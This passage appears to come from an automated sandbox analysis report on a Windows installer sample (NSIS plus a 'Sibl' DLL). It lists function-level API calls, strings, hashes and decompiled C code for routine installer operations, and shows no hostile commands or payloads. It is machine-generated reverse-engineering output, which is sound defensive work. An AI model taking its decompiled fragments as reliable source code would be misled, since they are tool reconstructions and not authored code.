                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileTemp$AllocatorBase::Concurrency::details::ContextDebugDeleteErrorHeapIdentityLastNamePathQueueWork
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp$sib
                                                                                                                • API String ID: 3679817218-2030889379
                                                                                                                • Opcode ID: b574c9cc45e7d37e3b829439e534819dfe865a03a8fa478871bd59ae4f4654d5
                                                                                                                • Instruction ID: 084041d768364844f3942a33c6fe925bd660825ed3dc595914d27197020a8495
                                                                                                                • Opcode Fuzzy Hash: b574c9cc45e7d37e3b829439e534819dfe865a03a8fa478871bd59ae4f4654d5
                                                                                                                • Instruction Fuzzy Hash: 81313B70C14249EBDB04DBA4CD55BEEBBB4BF08318F60452CE411BB2D0DB752A44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEB1530, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6FEB155F
                                                                                                                • RegisterEventSourceW.ADVAPI32(00000000,SIB), ref: 6FEB1599
                                                                                                                • DeregisterEventSource.ADVAPI32(00000000), ref: 6FEB162F
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EventSource$Base::Concurrency::details::ContextDeregisterIdentityQueueRegisterWorkstd::ios_base::good
                                                                                                                • String ID: SIB
                                                                                                                • API String ID: 2106344010-684891403
                                                                                                                • Opcode ID: e9e212b3b4968911492eed1ca29a5baf98d72b44e09eadb5154571b60c651293
                                                                                                                • Instruction ID: 059b55290392cf81b277926dbe031c1436f5d9139a5e735174a5fe41339836d8
                                                                                                                • Opcode Fuzzy Hash: e9e212b3b4968911492eed1ca29a5baf98d72b44e09eadb5154571b60c651293
                                                                                                                • Instruction Fuzzy Hash: 693150B0905209DBDF00CFD4CA04BEEBBB5FB05324F20422EE521AB2D0DB799645CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEE1373, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNEL32(00000000,6FEB14AA,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE1381
                                                                                                                • GetLastError.KERNEL32(?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE138F
                                                                                                                • CreateDirectoryW.KERNEL32(00000000,6FEB14AA,?,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE13FF
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE1409
                                                                                                                Strings
                                                                                                                • c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp, xrefs: 6FEE1439
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID: c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                • API String ID: 1375471231-2061300336
                                                                                                                • Opcode ID: f1e5405781a9c96e352a85be826c55455222e535bb1b126a33ca9e0d5660aff0
                                                                                                                • Instruction ID: e1b85d78dfcaacb480accd9ae8dbbc6f1535541f3bd4be0e066443e80933dc01
                                                                                                                • Opcode Fuzzy Hash: f1e5405781a9c96e352a85be826c55455222e535bb1b126a33ca9e0d5660aff0
                                                                                                                • Instruction Fuzzy Hash: 81210836A4423197DB211BE96840B6FBE65EF45B64F354135ED04EF340D7689D8183D2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEE0E77, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 6FEE0EA0
                                                                                                                • GetTempFileNameW.KERNEL32(?,00000104,00000000,?), ref: 6FEE0EBF
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE0EC9
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE0F00
                                                                                                                Strings
                                                                                                                • c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp, xrefs: 6FEE0F21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastTemp$FileNamePath
                                                                                                                • String ID: c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                • API String ID: 891594076-2061300336
                                                                                                                • Opcode ID: 0139c155610919c130a3a0f9fbf327b6e2c049d5601a644674fe2a1bf00741db
                                                                                                                • Instruction ID: f54a1a4074e92a789170ab3c9d6b78e618804da24d45db2d8fe0921280160d1d
                                                                                                                • Opcode Fuzzy Hash: 0139c155610919c130a3a0f9fbf327b6e2c049d5601a644674fe2a1bf00741db
                                                                                                                • Instruction Fuzzy Hash: CF11E77790122DA7DB20DAA49D04BDE7BACAF01764F110179AF41EB240DA74DD10C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEAA6B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • UuidCreate.RPCRT4(?), ref: 6FEAA6F2
                                                                                                                • UuidToStringW.RPCRT4(?,00000000), ref: 6FEAA710
                                                                                                                • RpcStringFreeW.RPCRT4(00000000), ref: 6FEAA735
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAA74E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: StringUuid$AllocatorCreateDebugFreeHeap
                                                                                                                • String ID: {%s}
                                                                                                                • API String ID: 1283604287-2304400190
                                                                                                                • Opcode ID: 24bb66da57a7d1987fd4a7a6e22dcfa5ced590cb00b6700aefbf2aa07389a2ce
                                                                                                                • Instruction ID: 1c25ce108ceec0053cff4ea4392a3271a4dbb2095c88a4cc04bc7fcb75051541
                                                                                                                • Opcode Fuzzy Hash: 24bb66da57a7d1987fd4a7a6e22dcfa5ced590cb00b6700aefbf2aa07389a2ce
                                                                                                                • Instruction Fuzzy Hash: 5C21FA75D10208DFCF04DFA4D984BEDBBB8FB08714F54465DE812BA280DB76AA44CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401EB9, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 52%
                                                                                                                			E00401EB9(void* __ebx) {
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t29;

				_t24 =  *0x40c0e0; // 0x0
				if( *((intOrPtr*)(_t29 - 0x24)) == __ebx) {
					if(_t22 == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x400c); // executed
						_t27 = _t9;
						_t6 = _t27 + 4; // 0x4
						E00406831(__ebx, _t24, _t27, _t6,  *((intOrPtr*)(_t29 - 0x2c)));
						_t12 =  *0x40c0e0; // 0x0
						 *_t27 = _t12;
						 *0x40c0e0 = _t27;
					} else {
						if(_t24 != __ebx) {
							_t4 = _t24 + 4; // 0x4
							E00406035(_t26, _t4);
							 *0x40c0e0 =  *_t24;
							_push(_t24);
							GlobalFree(); // executed
						} else {
							_push(L"Pop: stack empty");
							E004062CF();
							 *((intOrPtr*)(_t29 - 4)) = 1;
						}
					}
					goto L17;
				} else {
					while(1) {
						__eax = __eax - 1;
						if(__edi == __ebx) {
							break;
						}
						__edi =  *__edi;
						if(__eax != __ebx) {
							continue;
						} else {
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"install";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								__eax = E00406035();
								L17:
								 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t29 - 4));
								_t14 = 0;
							} else {
								break;
							}
						}
						goto L19;
					}
					__eax = E004062CF(L"Exch: stack < %d elements",  *((intOrPtr*)(__ebp - 0x24)));
					_push(0x200010);
					_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
					__eax = E00405CCC();
					_t14 = 0x7fffffff;
				}
				L19:
				return _t14;
			}











                                                                                                                0x00401ebc
                                                                                                                0x00401ec4
                                                                                                                0x00401f26
                                                                                                                0x00401f5a
                                                                                                                0x00401f63
                                                                                                                0x00401f65
                                                                                                                0x00401f69
                                                                                                                0x00401f6e
                                                                                                                0x00401f73
                                                                                                                0x00401f75
                                                                                                                0x00401f28
                                                                                                                0x00401f2a
                                                                                                                0x00401f3c
                                                                                                                0x00401f41
                                                                                                                0x00401f48
                                                                                                                0x00401f4d
                                                                                                                0x00402387
                                                                                                                0x00401f2c
                                                                                                                0x00401f2c
                                                                                                                0x00401f31
                                                                                                                0x00401a13
                                                                                                                0x00401a13
                                                                                                                0x00401f2a
                                                                                                                0x00000000
                                                                                                                0x00401ec6
                                                                                                                0x00401ec6
                                                                                                                0x00401ec6
                                                                                                                0x00401ec9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401ecb
                                                                                                                0x00401ecf
                                                                                                                0x00000000
                                                                                                                0x00401ed1
                                                                                                                0x00401ed3
                                                                                                                0x00401ef7
                                                                                                                0x00401efb
                                                                                                                0x00401f01
                                                                                                                0x00401f06
                                                                                                                0x00401f10
                                                                                                                0x00401f15
                                                                                                                0x00401f1a
                                                                                                                0x00401f1e
                                                                                                                0x00402e4b
                                                                                                                0x004030e3
                                                                                                                0x004030e6
                                                                                                                0x004030ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401ed3
                                                                                                                0x00000000
                                                                                                                0x00401ecf
                                                                                                                0x00401edd
                                                                                                                0x00401ee4
                                                                                                                0x00401ef1
                                                                                                                0x00401c3c
                                                                                                                0x00401632
                                                                                                                0x00401632
                                                                                                                0x004030ee
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                • GlobalFree.KERNEL32 ref: 00402387
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$install
                                                                                                                • API String ID: 1459762280-2295550231
                                                                                                                • Opcode ID: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
                                                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                • Opcode Fuzzy Hash: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
                                                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004022FD, Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E004022FD(int __ebx, short* __edi, short* __esi) {
				short* _t18;
				long _t19;
				void* _t22;
				void* _t36;
				void* _t41;

				_t18 = E0040145C(_t36, 0xffffffee);
				 *(_t41 - 0x44) = _t18;
				_t19 = GetFileVersionInfoSizeW(_t18, _t41 - 0x14);
				 *__esi = 0;
				 *(_t41 - 0x10) = _t19;
				 *__edi = 0;
				 *((intOrPtr*)(_t41 - 4)) = 1;
				if(_t19 != __ebx) {
					_t22 = GlobalAlloc(0x40, _t19);
					 *(_t41 + 8) = _t22;
					if(_t22 != __ebx) {
						if(GetFileVersionInfoW( *(_t41 - 0x44), __ebx,  *(_t41 - 0x10), _t22) != 0 && VerQueryValueW( *(_t41 + 8), "\\", _t41 - 8, _t41 - 0x44) != 0) {
							E00405F7D(__esi,  *((intOrPtr*)( *(_t41 - 8) + 8)));
							E00405F7D(__edi,  *((intOrPtr*)( *(_t41 - 8) + 0xc)));
							 *((intOrPtr*)(_t41 - 4)) = __ebx;
						}
						_push( *(_t41 + 8));
						GlobalFree(); // executed
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}








                                                                                                                0x004022ff
                                                                                                                0x00402309
                                                                                                                0x0040230c
                                                                                                                0x00402313
                                                                                                                0x00402316
                                                                                                                0x00402319
                                                                                                                0x0040231c
                                                                                                                0x00402325
                                                                                                                0x0040232e
                                                                                                                0x00402334
                                                                                                                0x00402339
                                                                                                                0x0040234e
                                                                                                                0x00402370
                                                                                                                0x0040237c
                                                                                                                0x00402381
                                                                                                                0x00402381
                                                                                                                0x00402384
                                                                                                                0x00402387
                                                                                                                0x00402387
                                                                                                                0x00402339
                                                                                                                0x004030e6
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                • GlobalFree.KERNEL32 ref: 00402387
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3376005127-0
                                                                                                                • Opcode ID: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
                                                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                • Opcode Fuzzy Hash: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
                                                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402B23, Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E00402B23(int __ebx, intOrPtr* __esi) {
				long _t14;
				struct _OVERLAPPED* _t20;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;

				_t26 = __esi;
				_t20 = __ebx;
				 *(_t28 + 8) = GlobalAlloc(0x40, 0x2004);
				if( *((intOrPtr*)(_t28 - 0x24)) == __ebx) {
					E0040145C(_t23, 0x11);
					WideCharToMultiByte(__ebx, __ebx, 0x4100f0, 0xffffffff,  *(_t28 + 8), 0x2004, __ebx, __ebx);
					_t14 = lstrlenA( *(_t28 + 8));
				} else {
					__ecx = 0;
					__ecx = 1;
					E00401446(1);
					__ecx =  *((intOrPtr*)(__ebp + 8));
					 *__ecx = __al;
				}
				if( *_t26 == _t20 || WriteFile(E00405F96(_t28 - 0x44, _t26),  *(_t28 + 8), _t14, _t28 - 0x44, _t20) == 0) {
					 *((intOrPtr*)(_t28 - 4)) = 1;
				}
				_push( *(_t28 + 8));
				GlobalFree(); // executed
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}








                                                                                                                0x00402b23
                                                                                                                0x00402b23
                                                                                                                0x00402b31
                                                                                                                0x00402b37
                                                                                                                0x00402b4d
                                                                                                                0x00402b61
                                                                                                                0x00402b6a
                                                                                                                0x00402b39
                                                                                                                0x00402b39
                                                                                                                0x00402b3b
                                                                                                                0x00402b3c
                                                                                                                0x00402b41
                                                                                                                0x00402b44
                                                                                                                0x00402b48
                                                                                                                0x00402b73
                                                                                                                0x00402b93
                                                                                                                0x00402b93
                                                                                                                0x00402384
                                                                                                                0x00402387
                                                                                                                0x004030e6
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2568930968-0
                                                                                                                • Opcode ID: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
                                                                                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                • Opcode Fuzzy Hash: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
                                                                                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDC439, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 6FEDC4F6
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6FEDC506
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                                                                • API String ID: 1646373207-1378992308
                                                                                                                • Opcode ID: 3b6c1d1bf273ee976d44b7b98bcb50147efb400b0d505abb386aafcfa0b244e2
                                                                                                                • Instruction ID: 17db91f16c49905c31d0805496e11b504ba923cb0e367ced76b6f6471202af2c
                                                                                                                • Opcode Fuzzy Hash: 3b6c1d1bf273ee976d44b7b98bcb50147efb400b0d505abb386aafcfa0b244e2
                                                                                                                • Instruction Fuzzy Hash: CD31B032601209DFDB00DF9CD990ADEBBE5EF093A8F20852AF91493650C771A952CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECF2A0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECF33E
                                                                                                                  • Part of subcall function 6FEAC3C0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,3A83C854), ref: 6FEAC409
                                                                                                                  • Part of subcall function 6FEAC3C0: Sleep.KERNEL32(00000064), ref: 6FEAC411
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECF35E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$FileModuleNameSleep
                                                                                                                • String ID: 8O{$\sib.dat
                                                                                                                • API String ID: 3729167558-3393832142
                                                                                                                • Opcode ID: 2e9631901a64ffaf96f7ed716ad0869d765ac3e1efd73e64a03660f762f64e34
                                                                                                                • Instruction ID: 0aaae3d206c13cb256920722466ecccb51cbb7915b609fef865ad5d064853c61
                                                                                                                • Opcode Fuzzy Hash: 2e9631901a64ffaf96f7ed716ad0869d765ac3e1efd73e64a03660f762f64e34
                                                                                                                • Instruction Fuzzy Hash: 941175B1918784AFCB48DFACC951B6E7BB4EB45324F20022DE4215F3C0DB355504CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF3823, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,8007000E,?,6FEE5559,6FEF399B,?,?,6FED0862,8007000E,?,?,?,6FEADCAC,8007000E,?,6FED08EC), ref: 6FEF3828
                                                                                                                • _free.LIBCMT ref: 6FEF3885
                                                                                                                • _free.LIBCMT ref: 6FEF38BB
                                                                                                                • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,8007000E,?,6FEE5559,6FEF399B,?,?,6FED0862,8007000E,?,?,?,6FEADCAC), ref: 6FEF38C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2283115069-0
                                                                                                                • Opcode ID: d9a96f81fe4862799cdeeecb2d0f71217d93d357886c951b185cffe42283df2a
                                                                                                                • Instruction ID: 494ee44be50d995d4dcf2bd057fd67100466720449c2112a02a6dc09de20eaca
                                                                                                                • Opcode Fuzzy Hash: d9a96f81fe4862799cdeeecb2d0f71217d93d357886c951b185cffe42283df2a
                                                                                                                • Instruction Fuzzy Hash: DE11EC336266456EDB0159798D82E163E5AABC627CB31067DF128963E0EF6688174231
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF1773, Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32 ref: 6FEF17C2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,6FECFBDD,6FECF5F0), ref: 6FEF17CE
                                                                                                                • __dosmaperr.LIBCMT ref: 6FEF17D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
